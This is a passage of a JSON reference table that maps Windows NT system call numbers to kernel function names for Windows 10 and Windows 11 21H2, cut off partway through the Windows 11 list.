\"NtLoadDriver\", \"262\": \"NtLoadEnclaveData\", \"263\": \"NtLoadKey\", \"264\": \"NtLoadKey2\", \"470\": \"NtLoadKey3\", \"265\": \"NtLoadKeyEx\", \"266\": \"NtLockFile\", \"327947\": \"NtLockProductActivationKeys\", \"196876\": \"NtLockRegistryKey\", \"269\": \"NtLockVirtualMemory\", \"196878\": \"NtMakePermanentObject\", \"196879\": \"NtMakeTemporaryObject\", \"272\": \"NtQueryObject\", \"273\": \"NtManagePartition\", \"274\": \"NtMapCMFModule\", \"655635\": \"NtMapUserPhysicalPages\", \"655363\": \"NtMapUserPhysicalPagesScatter\", \"40\": \"NtMapViewOfSection\", \"276\": \"NtMapViewOfSectionEx\", \"277\": \"NtModifyBootEntry\", \"278\": \"NtModifyDriverEntry\", \"279\": \"NtNotifyChangeDirectoryFile\", \"280\": \"NtNotifyChangeDirectoryFileEx\", \"281\": \"NtNotifyChangeKey\", \"282\": \"NtNotifyChangeMultipleKeys\", \"283\": \"NtNotifyChangeSession\", \"88\": \"NtOpenDirectoryObject\", \"284\": \"NtOpenEnlistment\", \"64\": \"NtOpenEvent\", \"285\": \"NtOpenEventPair\", \"51\": \"NtOpenFile\", \"286\": \"NtOpenIoCompletion\", \"287\": \"NtOpenJobObject\", \"18\": \"NtOpenKey\", \"288\": \"NtOpenKeyEx\", \"289\": \"NtOpenKeyTransacted\", \"290\": \"NtOpenKeyTransactedEx\", \"291\": \"NtOpenKeyedEvent\", \"292\": \"NtOpenMutant\", \"293\": \"NtOpenObjectAuditAlarm\", \"294\": \"NtOpenPartition\", \"295\": \"NtOpenPrivateNamespace\", \"38\": \"NtOpenProcess\", \"296\": \"NtOpenProcessToken\", \"48\": \"NtOpenProcessTokenEx\", \"297\": \"NtOpenRegistryTransaction\", \"298\": \"NtOpenResourceManager\", \"55\": \"NtOpenSection\", \"299\": \"NtOpenSemaphore\", \"300\": \"NtOpenSession\", \"301\": \"NtOpenSymbolicLinkObject\", \"302\": \"NtOpenThread\", \"36\": \"NtOpenThreadToken\", \"47\": \"NtOpenThreadTokenEx\", \"303\": \"NtOpenTimer\", \"304\": \"NtOpenTransaction\", \"305\": \"NtOpenTransactionManager\", \"306\": \"NtPlugPlayControl\", \"95\": \"NtPowerInformation\", \"307\": \"NtPrePrepareComplete\", \"308\": \"NtPrePrepareEnlistment\", \"309\": \"NtPrepareComplete\", \"310\": \"NtPrepareEnlistment\", \"786743\": \"NtPrivilegeCheck\", \"312\": \"NtPrivilegeObjectAuditAlarm\", \"313\": \"NtPrivilegedServiceAuditAlarm\", \"314\": \"NtPropagationComplete\", \"315\": \"NtPropagationFailed\", \"80\": \"NtProtectVirtualMemory\", \"316\": \"NtPssCaptureVaSpaceBulk\", \"459069\": \"NtPulseEvent\", \"61\": \"NtQueryAttributesFile\", \"318\": \"NtQueryAuxiliaryCounterFrequency\", \"319\": \"NtQueryBootEntryOrder\", \"320\": \"NtQueryBootOptions\", \"328001\": \"NtQueryDebugFilterState\", \"327701\": \"NtQueryDefaultLocale\", \"262212\": \"NtQueryDefaultUILanguage\", \"53\": \"NtQueryDirectoryFile\", \"322\": \"NtQueryDirectoryFileEx\", \"323\": \"NtQueryDirectoryObject\", \"324\": \"NtQueryDriverEntryOrder\", \"325\": \"NtQueryEaFile\", \"86\": \"NtQueryEvent\", \"326\": \"NtQueryFullAttributesFile\", \"327\": \"NtQueryInformationAtom\", \"328\": \"NtQueryInformationByName\", \"329\": \"NtQueryInformationEnlistment\", \"17\": \"NtQueryInformationFile\", \"330\": \"NtQueryInformationJobObject\", \"331\": \"NtQueryInformationPort\", \"25\": \"NtQueryInformationProcess\", \"332\": \"NtQueryInformationResourceManager\", \"37\": \"NtQueryInformationThread\", \"33\": \"NtQueryInformationToken\", \"333\": \"NtQueryInformationTransaction\", \"334\": \"NtQueryInformationTransactionManager\", \"335\": \"NtQueryInformationWorkerFactory\", \"262480\": \"NtQueryInstallUILanguage\", \"328017\": \"NtQueryIntervalProfile\", \"338\": \"NtQueryIoCompletion\", \"22\": \"NtQueryKey\", \"339\": \"NtQueryLicenseValue\", \"340\": \"NtQueryMultipleValueKey\", \"341\": \"NtQueryMutant\", \"342\": \"NtQueryOpenSubKeys\", \"343\": \"NtQueryOpenSubKeysEx\", \"327729\": \"NtQueryPerformanceCounter\", \"65880\": \"NtQueryPortInformationProcess\", \"345\": \"NtQueryQuotaInformationFile\", \"81\": \"NtQuerySection\", \"346\": \"NtQuerySecurityAttributesToken\", \"347\": \"NtQuerySecurityObject\", \"348\": \"NtQuerySecurityPolicy\", \"349\": \"NtQuerySemaphore\", \"350\": \"NtQuerySymbolicLinkObject\", \"351\": \"NtQuerySystemEnvironmentValue\", \"352\": \"NtQuerySystemEnvironmentValueEx\", \"54\": \"RtlGetNativeSystemInformation\", \"353\": \"NtQuerySystemInformationEx\", \"56\": \"NtQueryTimer\", \"655714\": \"NtQueryTimerResolution\", \"23\": \"NtQueryValueKey\", \"35\": \"NtQueryVirtualMemory\", \"73\": \"NtQueryVolumeInformationFile\", \"355\": \"NtQueryWnfStateData\", \"356\": \"NtQueryWnfStateNameInformation\", \"69\": \"NtQueueApcThread\", \"357\": \"NtQueueApcThreadEx\", \"358\": \"NtRaiseException\", \"359\": \"NtRaiseHardError\", \"1703942\": \"NtReadFile\", \"1703982\": \"NtReadFileScatter\", \"360\": \"NtReadOnlyEnlistment\", \"84\": \"NtReadRequestData\", \"63\": \"NtReadVirtualMemory\", \"361\": \"NtRecoverEnlistment\", \"362\": \"NtRecoverResourceManager\", \"363\": \"NtRecoverTransactionManager\", \"364\": \"NtRegisterProtocolAddressInformation\", \"196973\": \"NtRegisterThreadTerminatePort\", \"1311086\": \"NtReleaseKeyedEvent\", \"458784\": \"NtReleaseMutant\", \"786442\": \"NtReleaseSemaphore\", \"196975\": \"NtReleaseWorkerFactoryWorker\", \"1835017\": \"NtRemoveIoCompletion\", \"368\": \"NtRemoveIoCompletionEx\", \"370\": \"NtRenameKey\", \"371\": \"NtRenameTransactionManager\", \"372\": \"NtReplaceKey\", \"373\": \"NtReplacePartitionUnit\", \"12\": \"NtReplyPort\", \"11\": \"NtReplyWaitReceivePort\", \"43\": \"NtReplyWaitReceivePortEx\", \"374\": \"NtReplyWaitReplyPort\", \"375\": \"NtRequestPort\", \"34\": \"NtRequestWaitReplyPort\", \"459128\": \"NtResetEvent\", \"786809\": \"NtResetWriteWatch\", \"378\": \"NtRestoreKey\", \"196987\": \"NtResumeProcess\", \"458834\": \"NtResumeThread\", \"380\": \"NtRevertContainerImpersonation\", \"381\": \"NtRollbackComplete\", \"382\": \"NtRollbackEnlistment\", \"383\": \"NtRollbackRegistryTransaction\", \"384\": \"NtRollbackTransaction\", \"385\": \"NtRollforwardTransactionManager\", \"524674\": \"NtSaveKey\", \"917891\": \"NtSaveKeyEx\", \"721284\": \"NtSaveMergedKeys\", \"389\": \"NtSecureConnectPort\", \"390\": \"NtSerializeBoot\", \"391\": \"NtSetBootEntryOrder\", \"392\": \"NtSetBootOptions\", \"393\": \"NtSetCachedSigningLevel\", \"394\": \"NtSetCachedSigningLevel2\", \"395\": \"NtSetContextThread\", \"655756\": \"NtSetDebugFilterState\", \"197005\": \"NtSetDefaultHardErrorPort\", \"328078\": \"NtSetDefaultLocale\", \"262543\": \"NtSetDefaultUILanguage\", \"400\": \"NtSetDriverEntryOrder\", \"401\": \"NtSetEaFile\", \"458766\": \"NtSetEvent\", \"196653\": \"NtSetEventBoostPriority\", \"197010\": \"NtSetHighEventPair\", \"197011\": \"NtSetHighWaitLowEventPair\", \"459156\": \"NtSetIRTimer\", \"405\": \"NtSetInformationDebugObject\", \"406\": \"NtSetInformationEnlistment\", \"39\": \"NtSetInformationFile\", \"407\": \"NtSetInformationJobObject\", \"408\": \"NtSetInformationKey\", \"92\": \"NtSetInformationObject\", \"28\": \"NtSetInformationProcess\", \"409\": \"NtSetInformationResourceManager\", \"410\": \"NtSetInformationSymbolicLink\", \"13\": \"NtSetInformationThread\", \"411\": \"NtSetInformationToken\", \"412\": \"NtSetInformationTransaction\", \"413\": \"NtSetInformationTransactionManager\", \"414\": \"NtSetInformationVirtualMemory\", \"415\": \"NtSetInformationWorkerFactory\", \"328096\": \"NtSetIntervalProfile\", \"417\": \"NtSetIoCompletion\", \"418\": \"NtSetIoCompletionEx\", \"419\": \"NtSetLdtEntries\", \"197028\": \"NtSetLowEventPair\", \"197029\": \"NtSetLowWaitHighEventPair\", \"422\": \"NtSetQuotaInformationFile\", \"423\": \"NtSetSecurityObject\", \"424\": \"NtSetSystemEnvironmentValue\", \"425\": \"NtSetSystemEnvironmentValueEx\", \"426\": \"NtSetSystemInformation\", \"427\": \"NtSetSystemPowerState\", \"328108\": \"NtSetSystemTime\", \"328109\": \"NtSetThreadExecutionState\", \"98\": \"NtSetTimer\", \"430\": \"NtSetTimer2\", \"431\": \"NtSetTimerEx\", \"655792\": \"NtSetTimerResolution\", \"262577\": \"NtSetUuidSeed\", \"96\": \"NtSetValueKey\", \"434\": \"NtSetVolumeInformationFile\", \"435\": \"NtSetWnfProcessNotificationEvent\", \"262580\": \"NtShutdownSystem\", \"437\": \"NtShutdownWorkerFactory\", \"197046\": \"NtSignalAndWaitForSingleObject\", \"439\": \"NtSinglePhaseReject\", \"197048\": \"NtStartProfile\", \"197049\": \"NtStopProfile\", \"442\": \"NtSubscribeWnfStateChange\", \"197051\": \"NtSuspendProcess\", \"459196\": \"NtSuspendThread\", \"445\": \"NtSystemDebugControl\", \"446\": \"NtTerminateEnclave\", \"459199\": \"NtTerminateJobObject\", \"458796\": \"NtTerminateProcess\", \"458835\": \"NtTerminateThread\", \"131520\": \"NtTestAlert\", \"449\": \"NtThawRegistry\", \"450\": \"NtThawTransactions\", \"451\": \"NtTraceControl\", \"94\": \"NtTraceEvent\", \"1114564\": \"NtTranslateFilePath\", \"453\": \"NtUmsThreadYield\", \"454\": \"NtUnloadDriver\", \"455\": \"NtUnloadKey\", \"456\": \"NtUnloadKey2\", \"457\": \"NtUnloadKeyEx\", \"458\": \"NtUnlockFile\", \"459\": \"NtUnlockVirtualMemory\", \"42\": \"NtUnmapViewOfSection\", \"460\": \"NtUnmapViewOfSectionEx\", \"461\": \"NtUnsubscribeWnfStateChange\", \"462\": \"NtUpdateWnfStateData\", \"463\": \"NtVdmControl\", \"393680\": \"NtWaitForAlertByThreadId\", \"465\": \"NtWaitForDebugEvent\", \"1376722\": \"NtWaitForKeyedEvent\", \"1900635\": \"NtWaitForMultipleObjects\", \"1966106\": \"NtWaitForMultipleObjects32\", \"851972\": \"NtWaitForSingleObject\", \"467\": \"NtWaitForWorkViaWorkerFactory\", \"197076\": \"NtWaitHighEventPair\", \"197077\": \"NtWaitLowEventPair\", \"196609\": \"NtWorkerFactoryWorkerReady\", \"1703944\": \"NtWriteFile\", \"1703963\": \"NtWriteFileGather\", \"87\": \"NtWriteRequestData\", \"58\": \"NtWriteVirtualMemory\", \"65606\": \"NtYieldExecution\"}}, \"Windows 11\": {\"21H2\":{\"0\": \"NtAccessCheck\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"99\": \"NtAccessCheckByType\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAcquireCrossVmMutant\", \"104\": \"NtAcquireProcessActivityReference\", \"71\": \"NtAddAtom\", \"1114217\": \"NtAddAtomEx\", \"106\": \"NtAddBootEntry\", \"107\": \"NtAddDriverEntry\", \"108\": \"NtAdjustGroupsToken\", \"65\": \"NtAdjustPrivilegesToken\", \"109\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"458862\": \"NtAlertResumeThread\", \"196719\": \"NtAlertThread\", \"262256\": \"NtAlertThreadByThreadId\", \"262257\": \"NtAllocateLocallyUniqueId\", \"114\": \"NtAllocateReserveObject\", \"115\": \"NtAllocateUserPhysicalPages\", \"116\": \"NtAllocateUserPhysicalPagesEx\", \"1114229\": \"NtAllocateUuids\", \"24\": \"NtAllocateVirtualMemory\", \"118\": \"NtAllocateVirtualMemoryEx\", \"119\": \"NtAlpcAcceptConnectPort\", \"120\": \"NtAlpcCancelMessage\", \"121\": \"NtAlpcConnectPort\", \"122\": \"NtAlpcConnectPortEx\", \"123\": \"NtAlpcCreatePort\", \"124\": \"NtAlpcCreatePortSection\", \"125\": \"NtAlpcCreateResourceReserve\", \"126\": \"NtAlpcCreateSectionView\", \"127\": \"NtAlpcCreateSecurityContext\", \"128\": \"NtAlpcDeletePortSection\", \"129\": \"NtAlpcDeleteResourceReserve\", \"130\": \"NtAlpcDeleteSectionView\", \"131\": \"NtAlpcDeleteSecurityContext\", \"132\": \"NtAlpcDisconnectPort\", \"133\": \"NtAlpcImpersonateClientContainerOfPort\", \"134\": \"NtAlpcImpersonateClientOfPort\", \"135\": \"NtAlpcOpenSenderProcess\", \"136\": \"NtAlpcOpenSenderThread\", \"137\": \"NtAlpcQueryInformation\", \"138\": \"NtAlpcQueryInformationMessage\", \"139\": \"NtAlpcRevokeSecurityContext\", \"140\": \"NtAlpcSendWaitReceivePort\", \"141\": \"NtAlpcSetInformation\", \"76\": \"NtApphelpCacheControl\", \"327822\": \"NtAreMappedFilesTheSame\", \"524431\": \"NtAssignProcessToJobObject\", \"144\": \"NtAssociateWaitCompletionPacket\", \"145\": \"NtCallEnclave\", \"5\": \"NtCallbackReturn\", \"93\": \"NtCancelIoFile\", \"146\": \"NtCancelIoFileEx\", \"147\": \"NtCancelSynchronousIoFile\", \"458849\": \"NtCancelTimer\", \"148\": \"NtCancelTimer2\", \"149\": \"NtCancelWaitCompletionPacket\", \"150\": \"NtChangeProcessState\", \"151\": \"NtChangeThreadState\", \"196670\": \"NtClearEvent\", \"196671\": \"NtClose\", \"59\": \"NtCloseObjectAuditAlarm\", \"152\": \"NtCommitComplete\", \"153\": \"NtCommitEnlistment\", \"154\": \"NtCommitRegistryTransaction\", \"155\": \"NtCommitTransaction\", \"156\": \"NtCompactKeys\", \"157\": \"NtCompareObjects\", \"158\": \"NtCompareSigningLevels\", \"159\": \"NtCompareTokens\", \"160\": \"NtCompleteConnectPort\", \"196769\": \"NtCompressKey\", \"162\": \"NtConnectPort\", \"67\": \"NtContinue\", \"163\": \"NtContinueEx\", \"164\": \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\", \"165\": \"NtCreateCrossVmEvent\", \"166\": \"NtCreateCrossVmMutant\", \"167\": \"NtCreateDebugObject\", \"168\": \"NtCreateDirectoryObject\", \"169\": \"NtCreateDirectoryObjectEx\", \"170\": \"NtCreateEnclave\", \"171\": \"NtCreateEnlistment\", \"72\": \"NtCreateEvent\", \"172\": \"NtCreateEventPair\", \"85\": \"NtCreateFile\", \"173\": \"NtCreateIRTimer\", \"174\": \"NtCreateIoCompletion\", \"175\": \"NtCreateIoRing\", \"176\": \"NtCreateJobObject\", \"177\": \"NtCreateJobSet\", \"29\": \"NtCreateKey\", \"178\": \"NtCreateKeyTransacted\", \"179\": \"NtCreateKeyedEvent\", \"180\": \"NtCreateLowBoxToken\", \"181\": \"NtCreateMailslotFile\", \"182\": \"NtCreateMutant\", \"183\": \"NtCreateNamedPipeFile\", \"184\": \"NtCreatePagingFile\", \"185\": \"NtCreatePartition\", \"186\": \"NtCreatePort\", \"187\": \"NtCreatePrivateNamespace\", \"188\": \"NtCreateProcess\", \"77\": \"NtCreateProcessEx\", \"189\": \"NtCreateProcessStateChange\", \"190\": \"NtCreateProfile\", \"191\": \"NtCreateProfileEx\", \"192\": \"NtCreateRegistryTransaction\", \"193\": \"NtCreateResourceManager\", \"74\": \"NtCreateSection\", \"194\": \"NtCreateSectionEx\", \"195\": \"NtCreateSemaphore\", \"196\": \"NtCreateSymbolicLinkObject\", \"78\": \"NtCreateThread\", \"197\": \"NtCreateThreadEx\", \"198\": \"NtCreateThreadStateChange\", \"199\": \"NtCreateTimer\", \"200\": \"NtCreateTimer2\", \"201\": \"NtCreateToken\", \"202\": \"NtCreateTokenEx\", \"203\": \"NtCreateTransaction\", \"204\": \"NtCreateTransactionManager\", \"205\": \"NtCreateUserProcess\", \"206\": \"NtCreateWaitCompletionPacket\", \"207\": \"NtCreateWaitablePort\", \"208\": \"NtCreateWnfStateName\", \"209\": \"NtCreateWorkerFactory\", \"524498\": \"NtDebugActiveProcess\", \"211\": \"NtDebugContinue\", \"393268\": \"NtDelayExecution\", \"262356\": \"NtDeleteAtom\", \"213\": \"NtDeleteBootEntry\", \"214\": \"NtDeleteDriverEntry\", \"215\": \"NtDeleteFile\", \"216\": \"NtDeleteKey\", \"217\": \"NtDeleteObjectAuditAlarm\", \"218\": \"NtDeletePrivateNamespace\", \"219\": \"NtDeleteValueKey\", \"220\": \"NtDeleteWnfStateData\", \"221\": \"NtDeleteWnfStateName\", \"1769479\": \"NtDeviceIoControlFile\", \"222\": \"NtDirectGraphicsCall\", \"223\": \"NtDisableLastKnownGood\", \"224\": \"NtDisplayString\", \"225\": \"NtDrawText\", \"60\": \"NtDuplicateObject\", \"66\": \"NtDuplicateToken\", \"226\": \"NtEnableLastKnownGood\", \"227\": \"NtEnumerateBootEntries\", \"228\": \"NtEnumerateDriverEntries\", \"50\": \"NtEnumerateKey\", \"229\": \"NtEnumerateSystemEnvironmentValuesEx\", \"230\": \"NtEnumerateTransactionObject\", \"19\": \"NtEnumerateValueKey\", \"231\": \"NtExtendSection\", \"232\": \"NtFilterBootOption\", \"233\": \"NtFilterToken\", \"234\": \"NtFilterTokenEx\", \"655380\": \"NtFindAtom\", \"75\": \"NtFlushBuffersFile\", \"235\": \"NtFlushBuffersFileEx\", \"236\": \"NtFlushInstallUILanguage\", \"786669\": \"NtFlushInstructionCache\", \"196846\": \"NtFlushKey\", \"239\": \"NtFlushProcessWriteBuffers\", \"240\": \"NtFlushVirtualMemory\", \"65777\": \"NtFlushWriteBuffer\", \"242\": \"NtFreeUserPhysicalPages\", \"30\": \"NtFreeVirtualMemory\", \"243\": \"NtFreezeRegistry\", \"244\": \"NtFreezeTransactions\", \"1769529\": \"NtFsControlFile\", \"245\": \"NtGetCachedSigningLevel\", \"246\": \"NtGetCompleteWnfStateSubscription\", \"247\": \"NtGetContextThread\", \"1638648\": \"NtGetCurrentProcessorNumber\", \"249\": \"NtGetCurrentProcessorNumberEx\", \"459002\": \"NtGetDevicePowerState\", \"251\": \"NtGetMUIRegistryInfo\", \"252\": \"NtGetNextProcess\", \"253\": \"NtGetNextThread\", \"254\": \"NtGetNlsSectionPtr\", \"255\": \"NtGetNotificationResourceManager\", \"256\": \"NtGetWriteWatch\", \"196865\": \"NtImpersonateAnonymousToken\", \"458783\": \"NtImpersonateClientOfPort\", \"258\": \"NtImpersonateThread\", \"259\": \"NtInitializeEnclave\", \"260\": \"NtInitializeNlsFiles\", \"261\": \"NtInitializeRegistry\", \"1114374\": \"NtInitiatePowerAction\", \"524367\": \"NtIsProcessInJob\", \"65799\": \"NtIsSystemResumeAutomatic\", \"264\": \"NtIsUILanguageComitted\", \"265\": \"NtListenPort\", \"266\": \"NtLoadDriver\", \"267\": \"NtLoadEnclaveData\", \"268\": \"NtLoadKey\", \"269\": \"NtLoadKey2\", \"270\": \"NtLoadKey3\", \"271\": \"NtLoadKeyEx\", \"272\": \"NtLockFile\", \"327953\": \"NtLockProductActivationKeys\", \"196882\": \"NtLockRegistryKey\", \"275\": \"NtLockVirtualMemory\", \"196884\": \"NtMakePermanentObject\", \"196885\": \"NtMakeTemporaryObject\", \"278\": \"NtManageHotPatch\", \"279\": \"NtManagePartition\", \"280\": \"NtMapCMFModule\", \"655641\": \"NtMapUserPhysicalPages\", \"655363\": \"NtMapUserPhysicalPagesScatter\", \"40\": \"NtMapViewOfSection\", \"282\": \"NtMapViewOfSectionEx\", \"283\": \"NtModifyBootEntry\", \"284\": \"NtModifyDriverEntry\", \"285\": \"NtNotifyChangeDirectoryFile\", \"286\": \"NtNotifyChangeDirectoryFileEx\", \"287\": \"NtNotifyChangeKey\", \"288\": \"NtNotifyChangeMultipleKeys\", \"289\": \"NtNotifyChangeSession\", \"88\": \"NtOpenDirectoryObject\", \"290\": \"NtOpenEnlistment\", \"64\": \"NtOpenEvent\", \"291\": \"NtOpenEventPair\", \"51\": \"NtOpenFile\", \"292\": \"NtOpenIoCompletion\", \"293\": \"NtOpenJobObject\", \"18\": \"NtOpenKey\", \"294\": \"NtOpenKeyEx\", \"295\": \"NtOpenKeyTransacted\", \"296\": \"NtOpenKeyTransactedEx\", \"297\": \"NtOpenKeyedEvent\", \"298\": \"NtOpenMutant\", \"299\": \"NtOpenObjectAuditAlarm\", \"300\": \"NtOpenPartition\", \"301\": \"NtOpenPrivateNamespace\", \"38\": \"NtOpenProcess\", \"302\": \"NtOpenProcessToken\", \"48\": \"NtOpenProcessTokenEx\", \"303\": \"NtOpenRegistryTransaction\", \"304\": \"NtOpenResourceManager\", \"55\": \"NtOpenSection\", \"305\": \"NtOpenSemaphore\", \"306\": \"NtOpenSession\", \"307\": \"NtOpenSymbolicLinkObject\", \"308\": \"NtOpenThread\", \"36\": \"NtOpenThreadToken\", \"47\": \"NtOpenThreadTokenEx\", \"309\": \"NtOpenTimer\", \"310\": \"NtOpenTransaction\", \"311\": \"NtOpenTransactionManager\", \"312\": \"NtPlugPlayControl\", \"95\": \"NtPowerInformation\", \"313\": \"NtPrePrepareComplete\", \"314\": \"NtPrePrepareEnlistment\", \"315\": \"NtPrepareComplete\", \"316\": \"NtPrepareEnlistment\", \"786749\": \"NtPrivilegeCheck\", \"318\": \"NtPrivilegeObjectAuditAlarm\", \"319\": \"NtPrivilegedServiceAuditAlarm\", \"320\": \"NtPropagationComplete\", \"321\": \"NtPropagationFailed\", \"80\": \"NtProtectVirtualMemory\", \"322\": \"NtPssCaptureVaSpaceBulk\", \"459075\": \"NtPulseEvent\", \"61\": \"NtQueryAttributesFile\", \"324\": \"NtQueryAuxiliaryCounterFrequency\", \"325\": \"NtQueryBootEntryOrder\", \"326\": \"NtQueryBootOptions\", \"328007\": \"NtQueryDebugFilterState\", \"327701\": \"NtQueryDefaultLocale\", \"262212\": \"NtQueryDefaultUILanguage\", \"53\": \"NtQueryDirectoryFile\", \"328\": \"NtQueryDirectoryFileEx\", \"329\": \"NtQueryDirectoryObject\", \"330\": \"NtQueryDriverEntryOrder\", \"331\": \"NtQueryEaFile\", \"86\": \"NtQueryEvent\", \"332\": \"NtQueryFullAttributesFile\", \"333\": \"NtQueryInformationAtom\", \"334\": \"NtQueryInformationByName\", \"335\": \"NtQueryInformationEnlistment\", \"17\": \"NtQueryInformationFile\", \"336\": \"NtQueryInformationJobObject\", \"337\": \"NtQueryInformationPort\", \"25\": \"NtQueryInformationProcess\", \"338\": \"NtQueryInformationResourceManager\", \"37\": \"NtQueryInformationThread\", \"33\": \"NtQueryInformationToken\", \"339\": \"NtQueryInformationTransaction\", \"340\": \"NtQueryInformationTransactionManager\", \"341\": \"NtQueryInformationWorkerFactory\", \"262486\": \"NtQueryInstallUILanguage\", \"328023\": \"NtQueryIntervalProfile\", \"344\": \"NtQueryIoCompletion\", \"345\": \"NtQueryIoRingCapabilities\", \"22\": \"NtQueryKey\", \"346\": \"NtQueryLicenseValue\", \"347\": \"NtQueryMultipleValueKey\", \"348\": \"NtQueryMutant\", \"16\": \"NtQueryObject\", \"349\": \"NtQueryOpenSubKeys\", \"350\": \"NtQueryOpenSubKeysEx\", \"327729\": \"NtQueryPerformanceCounter\", \"65887\": \"NtQueryPortInformationProcess\", \"352\": \"NtQueryQuotaInformationFile\", \"81\": \"NtQuerySection\", \"353\": \"NtQuerySecurityAttributesToken\", \"354\": \"NtQuerySecurityObject\", \"355\": \"NtQuerySecurityPolicy\", \"356\": \"NtQuerySemaphore\", \"357\": \"NtQuerySymbolicLinkObject\", \"358\": \"NtQuerySystemEnvironmentValue\", \"359\": \"NtQuerySystemEnvironmentValueEx\", \"54\": \"NtQuerySystemInformation\", \"360\": \"NtQuerySystemInformationEx\", \"56\": \"NtQueryTimer\", \"655721\": \"NtQueryTimerResolution\", \"23\": \"NtQueryValueKey\", \"35\": \"NtQueryVirtualMemory\", \"73\": \"NtQueryVolumeInformationFile\", \"362\": \"NtQueryWnfStateData\", \"363\": \"NtQueryWnfStateNameInformation\", \"69\": \"NtQueueApcThread\", \"364\": \"NtQueueApcThreadEx\", \"365\": \"NtQueueApcThreadEx2\", \"366\": \"NtRaiseException\", \"367\": \"NtRaiseHardError\", \"1703942\": \"NtReadFile\", \"1703982\": \"NtReadFileScatter\", \"368\": \"NtReadOnlyEnlistment\", \"84\": \"NtReadRequestData\", \"63\": \"NtReadVirtualMemory\", \"369\": \"NtReadVirtualMemoryEx\", \"370\": \"NtRecoverEnlistment\", \"371\": \"NtRecoverResourceManager\", \"372\": \"NtRecoverTransactionManager\", \"373\": \"NtRegisterProtocolAddressInformation\", \"196982\": \"NtRegisterThreadTerminatePort\", \"1311095\": \"NtReleaseKeyedEvent\", \"458784\": \"NtReleaseMutant\", \"786442\": \"NtReleaseSemaphore\", \"196984\": \"NtReleaseWorkerFactoryWorker\", \"1835017\": \"NtRemoveIoCompletion\", \"377\": \"NtRemoveIoCompletionEx\", \"524666\": \"NtRemoveProcessDebug\", \"379\": \"NtRenameKey\", \"380\": \"NtRenameTransactionManager\", \"381\": \"NtReplaceKey\", \"382\": \"NtReplacePartitionUnit\", \"12\": \"NtReplyPort\", \"11\": \"NtReplyWaitReceivePort\", \"43\": \"NtReplyWaitReceivePortEx\", \"383\": \"NtReplyWaitReplyPort\", \"384\": \"NtRequestPort\", \"34\": \"NtRequestWaitReplyPort\", \"459137\": \"NtResetEvent\", \"786818\": \"NtResetWriteWatch\", \"387\": \"NtRestoreKey\", \"196996\": \"NtResumeProcess\", \"458834\": \"NtResumeThread\", \"389\": \"NtRevertContainerImpersonation\", \"390\": \"NtRollbackComplete\", \"391\": \"NtRollbackEnlistment\", \"392\": \"NtRollbackRegistryTransaction\", \"393\": \"NtRollbackTransaction\", \"394\": \"NtRollforwardTransactionManager\", \"524683\": \"NtSaveKey\", \"917900\": \"NtSaveKeyEx\", \"721293\": \"NtSaveMergedKeys\", \"398\": \"NtSecureConnectPort\", \"399\": \"NtSerializeBoot\", \"400\": \"NtSetBootEntryOrder\", \"401\": \"NtSetBootOptions\", \"402\": \"NtSetCachedSigningLevel\", \"403\": \"NtSetCachedSigningLevel2\", \"404\": \"NtSetContextThread\", \"655765\": \"NtSetDebugFilterState\", \"197014\": \"NtSetDefaultHardErrorPort\", \"328087\": \"NtSetDefaultLocale\", \"262552\": \"NtSetDefaultUILanguage\", \"409\": \"NtSetDriverEntryOrder\", \"410\": \"NtSetEaFile\", \"458766\": \"NtSetEvent\", \"196653\": \"NtSetEventBoostPriority\", \"197019\": \"NtSetHighEventPair\", \"197020\": \"NtSetHighWaitLowEventPair\", \"459165\": \"NtSetIRTimer\", \"414\": \"NtSetInformationDebugObject\", \"415\": \"NtSetInformationEnlistment\", \"39\": \"NtSetInformationFile\", \"416\": \"NtSetInformationIoRing\", \"417\": \"NtSetInformationJobObject\", \"418\": \"NtSetInformationKey\", \"92\": \"NtSetInformationObject\", \"28\": \"NtSetInformationProcess\", \"419\": \"NtSetInformationResourceManager\", \"420\": \"NtSetInformationSymbolicLink\", \"13\": \"NtSetInformationThread\", \"421\": \"NtSetInformationToken\", \"422\": \"NtSetInformationTransaction\", \"423\": \"NtSetInformationTransactionManager\", \"424\": \"NtSetInformationVirtualMemory\", \"425\": \"NtSetInformationWorkerFactory\", \"328106\": \"NtSetIntervalProfile\", \"427\": \"NtSetIoCompletion\", \"428\": \"NtSetIoCompletionEx\", \"429\": \"NtSetLdtEntries\", \"197038\": \"NtSetLowEventPair\", \"197039\": \"NtSetLowWaitHighEventPair\", \"432\": \"NtSetQuotaInformationFile\", \"433\": \"NtSetSecurityObject\", \"434\": \"NtSetSystemEnvironmentValue\", \"435\": \"NtSetSystemEnvironmentValueEx\", \"436\": \"NtSetSystemInformation\", \"437\": \"NtSetSystemPowerState\", \"328118\": \"NtSetSystemTime\", \"328119\": \"NtSetThreadExecutionState\", \"98\": \"NtSetTimer\", \"440\": \"NtSetTimer2\", \"441\": \"NtSetTimerEx\", \"655802\": \"NtSetTimerResolution\", \"262587\": \"NtSetUuidSeed\", \"96\": \"NtSetValueKey\", \"444\": \"NtSetVolumeInformationFile\", \"445\": \"NtSetWnfProcessNotificationEvent\", \"262590\": \"NtShutdownSystem\", \"447\": \"NtShutdownWorkerFactory\", \"1245632\": \"NtSignalAndWaitForSingleObject\", \"449\": \"NtSinglePhaseReject\", \"197058\": \"NtStartProfile\", \"197059\": \"NtStopProfile\", \"452\": \"NtSubmitIoRing\", \"453\": \"NtSubscribeWnfStateChange\", \"197062\": \"NtSuspendProcess\", \"459207\": \"NtSuspendThread\", \"456\": \"NtSystemDebugControl\", \"457\": \"NtTerminateEnclave\", \"459210\": \"NtTerminateJobObject\", \"458796\": \"NtTerminateProcess\", \"458835\": \"NtTerminateThread\", \"131531\": \"NtTestAlert\", \"460\": \"NtThawRegistry\", \"461\": \"NtThawTransactions\", \"462\": \"NtTraceControl\", \"94\": \"NtTraceEvent\", \"1114575\": \"NtTranslateFilePath\", \"464\": \"NtUmsThreadYield\", \"465\": \"NtUnloadDriver\", \"466\": \"NtUnloadKey\", \"467\": \"NtUnloadKey2\", \"468\": \"NtUnloadKeyEx\", \"469\": \"NtUnlockFile\", \"470\": \"NtUnlockVirtualMemory\", \"42\": \"NtUnmapViewOfSection\", \"471\": \"NtUnmapViewOfSectionEx\", \"472\": 